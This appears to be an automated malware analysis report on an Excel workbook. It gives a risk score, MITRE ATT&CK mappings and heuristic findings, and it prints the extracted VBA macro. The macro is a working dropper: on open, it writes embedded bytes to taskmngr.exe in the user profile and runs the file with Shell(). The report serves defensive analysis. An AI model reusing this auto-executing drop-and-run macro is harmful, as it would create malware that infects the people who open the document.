MALICIOUS
196
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1027 Obfuscated Files or Information
T1204.002 Malicious File
The sample is an Excel document with a Workbook_Open macro that is designed to execute automatically. The macro attempts to write a payload to the user's profile directory as 'taskmngr.exe' and then execute it using the Shell() function. The presence of the 'Enable Content' lure in the document body further supports the malicious intent.
Heuristics 7
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEETExcel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1700 bytes |
SHA-256: 606eb9ac3f5561e68e972af45fb57232bdccc70af0d2f132b7370e92a98c7f33 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim sFileText As String
Dim allFIleText As String
iFileNo = FreeFile
allFIleText = ""
sFileText = ""
For Each ws In ThisWorkbook.Worksheets
If ws.Name <> "Start" Then
ws.Visible = xlSheetVisible
End If
Next ws
Sheets("Start").Visible = xlVeryHidden
Set cp = Sheet1.CustomProperties
allFIleText = Sheet1.CustomProperties.Item(1).Value
Dim TestArray() As String
TestArray = Split(allFIleText, "|")
Dim i As Long
Dim filename As String
filename = Environ("USERPROFILE") & "\taskmngr.exe"
If Not Dir(filename) <> "" Then
Open filename For Binary Lock Read Write As #2
For i = 0 To 8191
Put #2, , CByte(TestArray(i))
Next
Close #2
End If
Dim RetVal As Long
RetVal = Shell(filename, 1)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 12800 bytes |
SHA-256: dfdcae580053a6c769becdfe66d2799468dad4a48c1197fccd6c732f9d4eee05 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.